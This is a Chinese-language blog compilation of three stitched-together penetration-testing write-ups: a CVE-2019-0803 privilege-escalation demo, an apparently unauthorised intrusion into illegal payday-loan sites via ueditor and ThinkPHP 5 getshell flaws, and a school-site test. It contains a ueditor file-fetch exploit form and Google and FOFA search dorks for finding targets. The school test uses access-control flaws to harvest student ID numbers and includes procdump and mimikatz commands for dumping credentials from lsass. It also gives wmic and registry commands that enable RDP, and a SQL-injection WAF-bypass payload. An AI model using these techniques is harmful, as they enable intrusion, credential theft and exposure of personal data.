2019年8月

Win32k 组件无法正确处理内存中的对象时,Windows 中存在特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式中运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

1.png

下面就简单演示一下利用CVE-2019-0803漏洞简单提权,首先下载

CVE-2019-0803.zip

上传到win08虚拟机内,查看一下当前用户发现是普通用户无法建立新的用户。

2.png

把上传的CVE-2019-0803拖进cmd里,创建新用户zz

3.png

从结果上看已经显示创建成功,说明我们利用漏洞成功了!

4.png

714高炮指那些期限为7天或14天的高利息网络贷款,其包含高额的“砍头息”及“逾期费用”。714高炮基本上90%都是以7天期为主。利息方面年化利率基本上都超过了1500%

说明

以借贷为业的民间借贷合同无效,意味着所有714、小高炮、借条等网络高利贷,合同都是无效的,借款人就算逾期,就算不还款,因为合同无效,放贷人也无法起诉到法院。这对遭遇网络高利贷暴力催收的人来说,无疑是一个福音:既然你爆我通讯录,我就是不还款,有本事你去告呗?反正法院也不支持你!

调查

经过长期的摸排经验累积主要有以下几个部分组成

放款人(有经济实力雄厚的大佬) - 借贷人 公司(有经营牌照的 比如某信)- 渠道(推广 或者是 贷超平台) - 借贷人

代理商负责推广 - 每个新开客户(10-14)(14-18元)不等,如果客户申请贷款通过还有额外的红利可以拿,据我所知,做代理的几乎每天除去成本都可以赚几千。至于信息数据的来源就有待考究了。

这其中还涉及到前期的审核,例如收集通讯录,实时记载短信记录,以及后期的催收。暴力催收等违法行为。

漏洞合集

1.首先感谢各位大佬公布的漏洞 TP5 GETSHELL 以及 .NET 框架ueditor的漏洞 让在下搞了不少东西。
GOOGLE关键词一:- 新用户注册. 登录提现 inurl:/account/login

1.png

2.png

.NET ASPX ueditor1.4.3漏洞 主要漏洞出现在编辑器漏洞,在/Content/ueditor/ 存在百度编辑器的漏洞,无任何的补丁可以直接上传。

3.png

但是迄今为止,也就三天左右的时间已经大部分修复,应该是同一伙人或一个人搭建的站点。总站点统计有一百多个,权限几乎都掉完了。可见其中利润之大。

2.关键词: 立即 inurl:/register/channel/

4.png

此开发为TP5.0框架,直接进行POST写shell

5.png

borrow_amount = 借款金额
borrow_days = 借款天数
borrow_rate = 利率
overdue_rate = 逾期利率
collection_rate = 催收服务费费率(借款金额x%催收天数)
verify_fee = 信息认证费
insurance_fee = 保险服务费
interest_fee = 借款利息
borrow_servcie_fee = 借款手续费
account_manage_fee = 账户管理费
truely_amount = 实际到账金额
total_fee = 服务总费用
例如:
借款2000元,扣除总费用600,剩余1400,如此高额的手续费。

现在来说下继714之后新的玩法

在前段时间,摸索高利贷平台.发现了某系统。

6.png

这是一套基于UI框架二开的后台管理程序,结合了商城,H5推广,管理,具体的源码之前在GITHUB找到了,未保存。

7.png

所见即所得,通过查询特征发现一群网站,所搜集的通讯录号码有千万,涉及百万借贷人。管理也是人才,有钱,阿里开了五十多台服务器。

说明

对比之前的714是直接收取手续费用,现在的714是通过手机评估,以及购买手机收取手续费用.举个例子,你需要借款,必须购买手机,手机为一千元,你需要支付400元的鉴定费用,才可以拿到1000元的借款,变相的还是付出了400的利息。其本质还是高利贷。

根据网上的漏洞利用

<form action="http://xx/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

通过对SHELL的比对,我得到了以下所有的信息
以47.xxx.xx.xx开头管理员总计开了大概有50台服务器作为高利贷推广放贷。

8.png

相同的框架相同的数据库密码,简称真香。。

结语

抛砖引玉,小弟放几个关键词容各位看官自由发挥。

GOOGLE
inurl:index/login/register.html 币 (区块链传销)
inurl:/index/login/respass.html 国际 (非法集资)
inurl:/loan/read/id/ (714借款)

FOFA
/static/index/js/lk/order.js (非法集资)
"/jslib-base/jquery-1.8.3.js" (贷后管理)
"/dev/static/index.css" (贷后管理)
"/css/ServerPage.css" (羔羊贷)

信息收集

渗透的本质=信息收集?随着实践的次数增多,慢慢发现信息收集的重要性,当掌握的信息越多,目标暴露的弱点也会越多,下一步进攻的突破口越明显。

浏览了目标的很多功能,没有发现可以操作的点,因此尝试登录以发现新的功能点寻找突破口。

1.png

该平台的默认账号密码为学号和身份证号后六位(也是大部分高校的惯性行为)。因此接下来就是收集学生的学号以及身份证号,学号比较好收集(谷歌语法一般都会找到很多),但是身份证号并不常见。但是我在另一个子域名的平台发现了两处不起眼的越权。

注: 目标网站是本人所在学校网站,且本人取得测试授权。虽然账号密码用自己的即可,但是作为一个攻击者,我就当从零开始。

2.png

直接访问该子域名的admin目录,发现可以越权访问,并在消费统计处查看到了大量学生学号等信息。接下来在此网站找到了第二处越权,可以查看任意学号/工号人员消费明细,且明细中包含身份证号码。(本来是觉着可以搞这个网站却发现后台其他功能报废了。。前台点了点各个功能才发现了这个越权)

3.png

拿到所需信息,登录目标平台。

4.png

Bypass && Getshell

登录发现没有权限访问个人中心?。。

5.png

普通学生用户只有发表留言的权限,调用的是简化魔改版ueditor编辑器,尝试了一下没有可利用漏洞。但是在抓包测试上传的时候仔细看了一下cookie,发现了有意思的东西。

6.png

在查看服务平台的相关管理人员回复的时候发现了账号为admin的回复。因此直接将参数值改为admin,直接成功越权到admin用户。

7.png

头像处可以上传,但是直接上传会被某waf拦截,不太清楚是什么waf,问了@X1r0z一嘴又忘记了。。总之可以绕过。

8.png

9.png

起初传了asp,发现访问返回404,好奇又传了php,结果也是404。最后发现只允许上传解析aspx文件 :)

10.png

登录远程服务器

已经是system权限了,肯定要登录到服务器看一眼,虽然没必要但是可以。

tasklist /svc

发现服务器3389没有开启,另外发现了360及安全狗进程。利用procdump+Mimikatz来读取windows明文密码。

由于prodump.exe是微软系统自带,有微软的签名证书,所以杀软不会拦截。
# lsass.dmp保存至当前目录
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 脱回本地,猕猴桃(mimikatz)读取明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

11.png

windows 2008 开启3389

wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

12.png

服务器在外网直接登录,结果发现:

13.png

折腾了半天还是不让我登录是吧,爷今天非要登录进去看一看!

开始我以为管理员在线,不能同时登录两个账号或者管理员把我踢了。后来@X1r0z提醒发现可能是安全狗的问题。将安全狗配置文件下载到本地查看,发现设置了白名单访问控制。

# 安全狗配置文件所在目录
C:\Program Files\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.ini
C:\Program Files(x86)\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.ini

14.png

虚拟机更改计算机为白名单内容项,登录。

15.png

单独的一台服务器没有内网,就到此为止了。

写在后面

那个不知道什么名字的waf,在最近测试其他目标的时候又遇到了,且可以bypass它的SQL注入防护。

# 经过测试发现在部分查询语句的时候拦截了substr 以及 or/and等。
# 绕过(我测试的目标是盲注,其他的注入方式可以自测,好像防护规则有点弱智)
?id=1' ^ (ascii(mid((select * from * ),1,1))>0)#